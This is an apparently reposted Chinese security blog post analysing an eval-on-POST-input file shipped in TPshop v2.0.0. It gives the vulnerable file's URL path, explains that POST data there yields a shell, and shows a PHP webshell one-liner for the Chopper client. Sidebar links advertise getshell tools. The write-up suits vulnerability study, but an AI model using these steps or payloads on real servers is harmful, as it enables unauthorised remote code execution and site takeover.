TPshop商城 Getshell后门文件分析与复现

最新推荐文章于 2024-05-31 18:14:17 发布
最新推荐文章于 2024-05-31 18:14:17 发布
阅读量1.2k 收藏 2
点赞数
文章标签: php shell
原文链接:http://www.cnblogs.com/ichunqiu/p/7832657.html
版权

本文作者:i春秋签约作家——Laimooc

官网地址:http://www.tp-shop.cn/

影响版本:TPSHOP v2.0.0

后门文件:eval-stdin.php 内容:

 

<?php  eval('?>' . file_get_contents('php://input')); ?>

分析:

使用

 

file_get_contents('php://input'))

接收POST请求的原始数据流

eval函数来执行。

我们把代码复制下来,本地调试如下,惊喜不,喜欢不,兴奋不:

1.jpg

利用方法:

访问后门文件 url/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php,post请求发送数据即可实现getshell。

2.jpg

那么问题来了,既然可以执行php代码,那么我们就直接配置菜刀连接.

采用写入的话就有点麻烦了。

地址:

http:xss.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

配置:

<O>
<?php eval($_POST[c]);?> </O>

3.jpg

4.jpg

转载于:https://www.cnblogs.com/ichunqiu/p/7832657.html

dfdhxb995397
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 769
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
tpshop商城分销源码可运营的,已亲测,Thinkphp5开发的tpshop分销源码
12-10
网上很多b2c分销功能不能用,后台支持一键升级,付费购买过来,已测试,程序有点大,无法直接上传,放在网盘
1day 未公开 Tpshop后台sql注入漏洞
weixin_43167326的博客
05-31 465
TPshop开源商城系统( Thinkphp shop的简称 ),是深圳搜豹网络有限公司开发的一套多商家模式的商城系统。适合企业及个人快速构建个性化网上商城。包含PC+IOS客户端+Android客户端+微商城,系统PC+后台是基于ThinkPHP MVC构架开发的跨平台开源软件。
TPshop的支付证书url直接访问漏洞
weixin_34111819的博客
12-13 281
2019独角兽企业重金招聘Python工程师标准>>> ...
ueditor php上传漏洞,Tpshop Ueditor.php任意文件上传
weixin_33181159的博客
03-11 999
in `/application/admin/controller/Ueditor.php line 80`, when action=uploadfile, FILES lead to function `upFile````case 'uploadfile':$fieldName = $CONFIG2['fileFieldName'];$result = $this->upFile($f...
ThinkPHP v5.x命令执行利用工具(可getshell
热门推荐
Fly_鹏程万里
12-13 1万+
漏洞验证 命令执行 getshell 工具下载 https://download.csdn.net/download/fly_hps/10848910 免责声明 该工具只能授权验证网站漏洞和站长验证漏洞使用。 禁止用于未授权测试,非法入侵,否则一切后果自负,和作者无关...
基于tpshop开发多商户源码支持手机端+商家+门店 +分销+淘宝数据导入+APP+可视化编辑
05-05
tpshop多商户源码,tpshop商城源码,tpshop b2b2c源码-支持手机端+商家+门店 +分销+淘宝数据导入+APP+可视化编辑 tpshop商城源码算是 thinkphp框架里做的比较早 比较好的源码了,写法简明 友好面向程序猿。 这是一款前几年的本 虽然后台看着老了些,丝毫不影响功能的完整使用。前几年这套卖几万的源码 这套源码还算是比较全的。 支持pc h5 小程序 APP 多商家 门店 分销 等等 更多本一曲源码也会相继发布出来,供大家学习参考!源码仅供大家学习参考交流。
域名批量采集+漏洞检测 V2015 绿化.rar
11-15
域名批量采集+漏洞检测 V2015 绿化 ,可以下载学习
某集团任意文件下载到虚拟主机getshell的方法
09-30
本文将深入探讨如何利用某集团的任意文件下载漏洞实现对虚拟主机的getshell操作。首先,我们需要理解什么是任意文件下载以及它是如何产生的。任意文件下载通常发生在网站允许用户通过URL参数指定要下载的文件名,但...
TP-SHOP支付宝+微信免签约插件
12-29
所有文件都是新增。支付宝可以直接上传到插件目录。但是微信支付没有回调跳转地址的,所需新增了一个文件用于查询订单状态。需要保证前台能访问,所以在Application项目里面新增了一个查询文件。是安全文件。放心使用。 plugins里面的文件是微信扫码支付样式文件。微信扫码支付成功后会自动跳转。 将整个文件夹里面按照目录上传即可。 上传后在网站后台插件管理,安装插件,然后配置信息。
批量getshell工具新
12-21
批量getshell工具【2023最新】这是一种内部有多个漏洞,可自动进行url采集,自动爬虫多个引擎和友情链接url,过狗一句话,轻松日出上千。
某shop后台sql注入漏洞
bishan4656的博客
07-05 872
前言 最近看了下tpshop,审计出几个鸡肋的漏洞,这个SQL注入漏洞是其中之一。然后审计完网上搜了一下发现有一堆后台的sql注入漏洞,应该是觉得后台的SQL不用修叭(我个人是可以理解的)。 漏洞触发点 首先要登录后台,这也是我说漏洞很鸡肋的原因。漏洞位于在后台的商城-》文章->文章列表处的搜索抓包,存在漏洞的参数是keywords,当输入payload' or length(databas...
day17 个人博客项目&TP框架&路由访问&安全写法&历史漏洞
wanjia01的博客
06-04 953
#知识点:1、基于TP框架入门安装搭建使用2、基于TP框架内置安全写法评估3、基于TP框架实例源码安全性评估TP框架开发的CMS#实例-CMS源码-EyouCMS&Fastadmin&YFCMFAdminLTE后台管理系统layui后台管理系统thinkcmfH-ui.admin后台管理系统tpshopFsatAdmineyoucmsLarryCMS后台管理系统tpadmin后台管理系统snake后台管理系统ThinkSNSDolphinPHP后台管理系统WeMall商城系统CLTPHP齐博CMSDSMAL
审计某开源商城中的漏洞大礼包
hl1293348082的专栏
03-27 169
首先这个 CMS 并不怎么出名,拿来当审计样板却很合适。给我的感觉是适合初级水平升中级之间的过程,也算是对上一篇审计文章的后续文了。 审计的本为: 20180206 发布的免费 2.0 。另外图很多,建议 PC 端体验更佳! 分析环境及入口 图中的 URL 会出现两个,这是因为部分在公司审计的,部分是周末在家审计的。 官网首页上有文档,里面注明了这套 CMS 所使用环境: ThinkPHP5.0 + MySQL 这样看来实际上我们只需要熟悉 TP5,就能大体知道该 CMS 的请求流程,而
tpshop的使用环境配置
码小跳的博客
08-22 4401
最近在使用tpshop开发某公司的一个商城项目,将环境配置过程记录一下。 大致步骤: 1.下载tpshop源码 2.下载并安装php集成开发环境(wampserver软件安装包) 3.调试Tpshop源码  下载tpshop源码 进入tpshop官网 http://www.tp-shop.cn 进行下载 点击免费下载进入下载页面: 点击 下载TPshop源码(即第一个按...
myshop网上商城后台存储型XSS漏洞
fansenliangren的博客
11-30 312
xss漏洞原理:攻击者提交的XSS代码被存储到服务器上的数据库里或页面或某个上传文件里,导致用户访问页面展示的内容时直接触发攻击者的代码。
后台文件上传getshell漏洞怎么解决漏洞
最新发布
06-29
后台文件上传中的 GETshell 漏洞通常发生在服务器处理文件上传请求时,如果未正确验证上传文件类型、大小或内容,恶意用户可能会上传包含恶意脚本的文件,这些脚本可以在服务器上执行,从而获取系统的控制权(shell)。 解决这类漏洞的方法包括: 1. **验证上传内容**:确保上传文件类型限制在预期范围内,比如只允许上传图片、文档等特定类型的文件,而不是可执行文件或包含脚本的文件。 2. **文件名和路径限制**:对上传的文件名进行转义和过滤,避免使用特殊字符造成目录遍历或恶意路径执行。同时,上传文件应存储在安全的、不可执行的文件夹中。 3. **二进制模式检查**:使用二进制模式打开上传文件,而不是文本模式,防止脚本注入。 4. **文件扩展名验证**:即使文件名被修改,也要检查上传文件的实际类型,不依赖于文件名。 5. **文件内容检查**:使用安全的文件内容检测工具,扫描文件的内容以查找可能的恶意代码。 6. **启用安全配置**:启用服务器的文件权限管理,确保上传的文件只能被拥有者或授权用户访问,而不能执行。 7. **使用预定义上传目录**:避免使用相对或绝对路径,而是使用预定义的上传目录,减少潜在的路径遍历攻击。 8. **启用HTTP头限制**:设置合适的Content-Type限制,防止恶意构造的请求头引发漏洞。 9. **更新和补丁管理**:定期更新服务器软件和框架,修复已知的安全漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值